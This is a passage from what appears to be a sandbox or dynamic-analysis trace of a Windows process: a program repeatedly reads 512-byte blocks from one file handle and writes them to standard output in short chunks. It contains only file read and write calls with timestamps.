(_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.390] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.390] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] 
GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 
[0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.391] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.391] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.392] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.392] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType 
(hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.394] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.394] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.394] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, 
lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.395] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.395] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 
[0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, 
lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.397] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.397] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.397] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.398] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.398] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, 
lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 
